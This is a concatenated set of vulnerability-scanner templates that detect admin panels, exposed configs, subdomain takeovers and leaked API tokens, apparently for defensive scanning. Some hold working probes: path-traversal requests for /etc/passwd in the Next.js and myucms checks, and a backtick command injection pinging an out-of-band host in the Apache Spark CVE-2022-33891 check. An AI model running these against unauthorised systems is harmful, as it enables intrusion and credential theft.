android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" -------------------------------------------------------------------------------- /X-Client-IP.yaml: -------------------------------------------------------------------------------- 1 | id: x-client-ip 2 | 3 | info: 4 | name: x-client-ip 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Client-IP: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil.com" 20 | -------------------------------------------------------------------------------- /api/mailchimp-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-access-key-value 2 | 3 | info: 4 | name: Mailchimp API Value 5 | author: puzzlepeaches 6 | severity: info 7 | tags: exposure,token,mailchimp 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[0-9a-f]{32}-us[0-9]{1,2}" 19 | -------------------------------------------------------------------------------- /api/sendgrid-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key 2 | 3 | info: 4 | name: Sendgrid API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,sendgrid 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}' 18 | -------------------------------------------------------------------------------- /branch-key.yaml: -------------------------------------------------------------------------------- 1 | id: branch-key 2 | 3 | info: 4 | name: Branch.io Live Key 5 | author: 0xh7ml 6 | severity: info 7 | reference: 8 | - https://github.com/BranchMetrics/android-branch-deep-linking-attribution/issues/74 9 | tags: token,file 10 | 11 | file: 12 | - extensions: 13 | - all 14 | 15 | extractors: 16 | - type: regex 17 | regex: 18 | - "key_live_.{32}" 19 | -------------------------------------------------------------------------------- /manage-engine-admanager-panel.yaml: -------------------------------------------------------------------------------- 1 | id: manage-engine-admanager-panel 2 | 3 | info: 4 | name: Manage Engine ADManager Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/authorization.do" 13 | matchers: 14 | - type: word 15 | words: 16 | - "ManageEngine - ADManager Plus" 17 | -------------------------------------------------------------------------------- /sonarqube-token.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-token 2 | 3 | info: 4 | name: SonarQube Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,sonarqube 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?" 18 | -------------------------------------------------------------------------------- /stripe-restricted-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-restricted-key 2 | 3 | info: 4 | name: Stripe Restricted Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,stripe 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' 18 | -------------------------------------------------------------------------------- /surge-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surge-takeover 2 | 3 | info: 4 | name: surge takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - project not found -------------------------------------------------------------------------------- /versa-sdwan.yaml: -------------------------------------------------------------------------------- 1 | id: versa-sdwan 2 | 3 | info: 4 | name: Versa Networks SD-WAN Application 5 | author: pdteam 6 | severity: info 7 | tags: panel,versa,sdwan 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/versa/login.html" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "Versa Networks" -------------------------------------------------------------------------------- /vm/saferoads-vms-login.yaml: -------------------------------------------------------------------------------- 1 | id: saferoads-vms-login 2 | 3 | info: 4 | name: Saferoads VMS Login 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6941 9 | tags: panel 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/login.html' 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Saferoads VMS' -------------------------------------------------------------------------------- /werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdteam 6 | severity: info 7 | tags: tech,werkzeug 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/console" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "

Interactive Console

" 18 | part: body 19 | -------------------------------------------------------------------------------- /bmc-panel-detect.yaml: -------------------------------------------------------------------------------- 1 | id: bmc-panel-detect 2 | 3 | info: 4 | name: BMC Discovery Outpost Panel Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: panel,bmc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/adminlogin" 13 | 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "BMC Discovery Outpost: Login" 19 | -------------------------------------------------------------------------------- /jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: pdteam 6 | severity: low 7 | tags: config,status 8 | 9 | requests: 10 | - method: GET 11 | headers: 12 | X-Forwarded-For: "127.0.0.1" 13 | path: 14 | - "{{BaseURL}}/jkstatus/" 15 | matchers: 16 | - type: word 17 | words: 18 | - "JK Status Manager" 19 | -------------------------------------------------------------------------------- /kinsta-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: kinsta-takeover 2 | 3 | info: 4 | name: kinsta takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - No Site For Domain -------------------------------------------------------------------------------- /X-Remote-Addr.yaml: -------------------------------------------------------------------------------- 1 | id: x-remote-addr 2 | 3 | info: 4 | name: x-remote-addr 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Remote-Addr: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil.com" 20 | -------------------------------------------------------------------------------- /api/artifactory-api-token.yaml: -------------------------------------------------------------------------------- 1 | id: artifactory-api-token 2 | 3 | info: 4 | name: Artifactory API Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,artifactory 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}' -------------------------------------------------------------------------------- /api/google-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API Key 5 | author: Swissky 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/hopfully404" 14 | 15 | extractors: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "AIza[0-9A-Za-z\\-_]{35}" 20 | -------------------------------------------------------------------------------- /cve/2017/CVE-2017-16877.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-16877 2 | 3 | info: 4 | name: Nextjs v2.4.1 LFI 5 | author: Loneyer 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /_next/../../../../../../../../../../etc/passwd 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /discord-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: discord-webhook 2 | 3 | info: 4 | name: Discord Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,discord 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+' -------------------------------------------------------------------------------- /e-vulnerability/ikuai-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ikuai-login-panel 2 | 3 | info: 4 | name: iKuai 登录爱快流控路由登录页面 5 | author: zan8in 6 | severity: info 7 | description: | 8 | title="登录爱快流控路由" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: / 15 | follow_redirects: true 16 | expression: response.status == 200 && response.body.bcontains(b'登录爱快流控路由') 17 | expression: r0() -------------------------------------------------------------------------------- /httpbin-detection.yaml: -------------------------------------------------------------------------------- 1 | id: httpbin-detection 2 | 3 | info: 4 | name: HTTPBin Detection 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: false 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '<a href="https://github.com/requests/httpbin" class="github-corner"' 19 | -------------------------------------------------------------------------------- /jdbc-connection-string.yaml: -------------------------------------------------------------------------------- 1 | id: jdbc-connection-string 2 | 3 | info: 4 | name: JDBC Connection String Disclosure 5 | author: Ice3man 6 | severity: unknown 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+' -------------------------------------------------------------------------------- /x-forwarded-for.yaml: -------------------------------------------------------------------------------- 1 | id: x-forwarded-for 2 | 3 | info: 4 | name: x-forwarded-for 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Forwarded-For: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil" 20 | -------------------------------------------------------------------------------- /a-fingerprinting/django-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: django-admin-panel 2 | 3 | info: 4 | name: Python Django Admin Panel 5 | author: pdteam 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /admin/login/?next=/admin/ 14 | expression: response.status == 200 && response.body.bcontains(b"<a href=\"/admin/\">Django administration</a>") 15 | expression: r0() -------------------------------------------------------------------------------- /a-fingerprinting/sonicwall-management-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-management-panel 2 | 3 | info: 4 | name: SonicWall Management Panel 5 | author: PR3R00T 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /auth.html 14 | expression: response.status == 200 && response.body.bcontains(b'<title>SonicWall - Authentication') 15 | expression: r0() -------------------------------------------------------------------------------- /b-disclosure/hadoop-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: hadoop-disclosure 2 | 3 | info: 4 | name: Apache Hadoop Disclosure 5 | author: zan8in 6 | severity: low 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /dfshealth.html 14 | expression: response.status == 200 && response.body.bcontains(b'class="navbar-brand"') && response.body.bcontains(b'dfshealth.js') 15 | expression: r0() -------------------------------------------------------------------------------- /c-unauthorized/frp-unauthenticated.yaml: -------------------------------------------------------------------------------- 1 | id: frp-unauthenticated 2 | 3 | info: 4 | name: FRP Unauthenticated 5 | author: pikpikcu 6 | severity: info 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /static 14 | expression: response.status == 200 && response.body.bcontains(b"frps dashboard") 15 | expression: r0() 16 | -------------------------------------------------------------------------------- /c-unauthorized/kibana-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: kibana-unauth 2 | 3 | info: 4 | name: Kibana Unauth 5 | author: Isaac(https://github.com/IsaacQiang) 6 | severity: high 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /app/kibana 14 | expression: response.status == 200 && response.body.bcontains(b".kibanaWelcomeView") 15 | expression: r0() 16 | -------------------------------------------------------------------------------- /circleci.yaml: -------------------------------------------------------------------------------- 1 | id: api-circleci 2 | 3 | info: 4 | name: CircleCI API Test 5 | author: zzeitlin 6 | reference: https://circleci.com/docs/api/v1 7 | severity: info 8 | tags: token-spray,circle,circleci 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://circleci.com/api/v1.1/me?circle-token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /cve/2022/CVE-2022-33891.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-33891 2 | 3 | info: 4 | name: Apache Spark shell command injection vulnerability via Spark UI 5 | author: zan8in 6 | severity: high 7 | 8 | set: 9 | reverse: newReverse() 10 | reverseDomain: reverse.url.host 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /doAs?=`ping+{{reverseDomain}}` 16 | expression: reverse.wait(5) 17 | expression: r0() -------------------------------------------------------------------------------- /dynamic-broadcast-receiver.yaml: -------------------------------------------------------------------------------- 1 | id: dynamic-registered-broadcast-receiver 2 | 3 | info: 4 | name: Dynamic Registered Broadcast Receiver 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" -------------------------------------------------------------------------------- /e-vulnerability/myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | 3 | info: 4 | name: myucms lfr 5 | author: jinqi 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /git/github-enterprise-detect.yaml: -------------------------------------------------------------------------------- 1 | id: github-enterprise-detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | severity: info 7 | tags: panel,github 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "GitHub · Enterprise" 20 | -------------------------------------------------------------------------------- /google/google-storage.yaml: -------------------------------------------------------------------------------- 1 | id: gstorage-detect 2 | 3 | info: 4 | name: Google Bucket detection 5 | author: 0xTeles 6 | severity: info 7 | tags: tech,gstorage,google,bucket 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - x-goog-metageneration 17 | - X-Goog-Metageneration 18 | part: header 19 | -------------------------------------------------------------------------------- /jazzhr-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jazzhr-takeover 2 | 3 | info: 4 | name: jazzhr takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - This account no longer active -------------------------------------------------------------------------------- /mashery-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: mashery-takeover 2 | 3 | info: 4 | name: mashery takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Unrecognized domain -------------------------------------------------------------------------------- /newrelic-synthetics-location-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-synthetics-location-key 2 | 3 | info: 4 | name: Synthetics Location Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}' -------------------------------------------------------------------------------- /prometheus-exposed-panel.yaml: -------------------------------------------------------------------------------- 1 | id: prometheus-exposed-panel 2 | 3 | info: 4 | name: Prometheus.io exposed panel 5 | author: organiccrap 6 | severity: low 7 | tags: panel,prometheus 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/graph' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Prometheus Time Series Collection and Processing Server' -------------------------------------------------------------------------------- /provider-path.yaml: -------------------------------------------------------------------------------- 1 | id: insecure-provider-path 2 | 3 | info: 4 | name: Insecure Provider Path 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\".\"" 17 | - "root-path name=\"[0-9A-Za-z\\-_]{1,10}\" path=\"\"" 18 | -------------------------------------------------------------------------------- /selenoid-ui-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: selenoid-ui-exposure 2 | 3 | info: 4 | name: Selenoid UI Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/login' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Selenoid UI" 17 | - "/manifest.json" 18 | condition: and -------------------------------------------------------------------------------- /smugmug-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: smugmug-takeover 2 | 3 | info: 4 | name: smugmug takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - '{"text":"Page Not Found"' -------------------------------------------------------------------------------- /surveygizmo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surveygizmo-takeover 2 | 3 | info: 4 | name: surveygizmo takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - data-html-name -------------------------------------------------------------------------------- /tave-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: tave-takeover 2 | 3 | info: 4 | name: tave takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "

Error 404: Page Not Found

" -------------------------------------------------------------------------------- /ansible-config-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: ansible-config-disclosure 2 | 3 | info: 4 | name: Ansible Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/ansible.cfg' 13 | matchers: 14 | - type: word 15 | words: 16 | - '[defaults]' 17 | - '[inventory]' 18 | condition: and -------------------------------------------------------------------------------- /dotcms-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: dotcms-admin-panel 2 | 3 | info: 4 | name: dotAdmin Panel 5 | author: impramodsargar 6 | severity: info 7 | tags: panel,dotcms,cms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dotAdmin/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'dotCMS Content Management Platform' 19 | -------------------------------------------------------------------------------- /e-vulnerability/web-config.yaml: -------------------------------------------------------------------------------- 1 | id: web-config 2 | 3 | info: 4 | name: Web Config file 5 | author: Yash Anand @yashanand155 6 | severity: info 7 | tags: config,exposure 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /web.config 14 | expression: response.status == 200 && response.body.bcontains(b'') && response.body.bcontains(b'') 15 | expression: r0() -------------------------------------------------------------------------------- /fastly-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: fastly-takeover 2 | 3 | info: 4 | name: fastly takeover detection 5 | author: pdcommunity 6 | severity: info 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Fastly error: unknown domain:" -------------------------------------------------------------------------------- /hatenablog-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hatenablog-takeover 2 | 3 | info: 4 | name: hatenablog takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 404 Blog is not found -------------------------------------------------------------------------------- /lazy-file.yaml: -------------------------------------------------------------------------------- 1 | id: lazy-file-manager 2 | 3 | info: 4 | name: Lazy File Manager 5 | author: amsda 6 | severity: medium 7 | tags: exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/lfm.php" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | 19 | - type: word 20 | words: 21 | - Lazy File Manager -------------------------------------------------------------------------------- /readme-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readme-takeover 2 | 3 | info: 4 | name: readme takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Project doesnt exist... yet!' 20 | -------------------------------------------------------------------------------- /server-status.yaml: -------------------------------------------------------------------------------- 1 | id: server-status-localhost 2 | 3 | info: 4 | name: Server Status Disclosure 5 | author: pdteam,geeknik 6 | severity: low 7 | tags: apache,debug 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/server-status" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Apache Server Status" 18 | - "Server Version" 19 | condition: and -------------------------------------------------------------------------------- /traefik-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: traefik-dashboard-detect 2 | 3 | info: 4 | name: Traefik Dashboard 5 | author: schniggie,StreetOfHackerR007 6 | severity: info 7 | tags: panel,traefik 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/dashboard/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /webmin/webmin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: webmin-panel 2 | 3 | info: 4 | name: Webmin Admin Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,webmin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/webmin/" 14 | redirects: true 15 | matchers: 16 | - type: word 17 | words: 18 | - "Login to Webmin" 19 | part: body 20 | -------------------------------------------------------------------------------- /zendesk-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: zendesk-takeover 2 | 3 | info: 4 | name: zendesk takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - this help center no longer exists -------------------------------------------------------------------------------- /api/artifactory-api-password.yaml: -------------------------------------------------------------------------------- 1 | id: artifactory-api-password 2 | 3 | info: 4 | name: Artifactory Password Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,artifactory 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}' -------------------------------------------------------------------------------- /api/zapier-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: zapier-webhook-token 2 | 3 | info: 4 | name: Zapier Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/' -------------------------------------------------------------------------------- /druid-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: druid-console-exposure 2 | 3 | info: 4 | name: Alibaba Druid Console Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel,alibaba,druid 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'src="/druid.js"' 18 | - 'href="/druid.css"' 19 | condition: and 20 | -------------------------------------------------------------------------------- /electron-version-detect.yaml: -------------------------------------------------------------------------------- 1 | id: electron-version-detect 2 | 3 | info: 4 | name: Electron Version Detect 5 | author: me9187 6 | severity: info 7 | reference: 8 | - https://www.electronjs.org/blog/chromium-rce-vulnerability/ 9 | tags: electron,file 10 | 11 | file: 12 | - extensions: 13 | - json 14 | 15 | extractors: 16 | - type: regex 17 | regex: 18 | - '"electronVersion":"[^"]*"' 19 | -------------------------------------------------------------------------------- /exposed-webalizer.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-webalizer 2 | 3 | info: 4 | name: Publicly exposed Webalizer Interface 5 | author: pdteam 6 | severity: low 7 | tags: panel,webalizer 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/webalizer/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Webalizer Version" 17 | - "Usage statistics for" 18 | condition: and 19 | -------------------------------------------------------------------------------- /feedpress-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: feedpress-takeover 2 | 3 | info: 4 | name: Agilecrm Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'The feed has not been found.' -------------------------------------------------------------------------------- /gemfury-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: gemfury-takeover 2 | 3 | info: 4 | name: gemfury takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "404: This page could not be found." -------------------------------------------------------------------------------- /memcached-stats.yaml: -------------------------------------------------------------------------------- 1 | id: memcached-stats 2 | 3 | info: 4 | name: Memcached stats disclosure 5 | author: pdteam 6 | severity: low 7 | tags: network,memcached 8 | 9 | network: 10 | - inputs: 11 | - data: "stats\r\n\r\nquit\r\n" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | - "{{Host}}:11211" 16 | read-size: 2048 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "STAT " -------------------------------------------------------------------------------- /readthedocs-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: readthedocs-takeover 2 | 3 | info: 4 | name: readthedocs takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - unknown to Read the Docs -------------------------------------------------------------------------------- /smartling-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: smartling-takeover 2 | 3 | info: 4 | name: smartling takeover detection 5 | author: pdcommunity 6 | severity: info 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers: 15 | - type: word 16 | words: 17 | - Domain is not configured 18 | -------------------------------------------------------------------------------- /teamwork-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: teamwork-takeover 2 | 3 | info: 4 | name: teamwork takeover detection 5 | author: 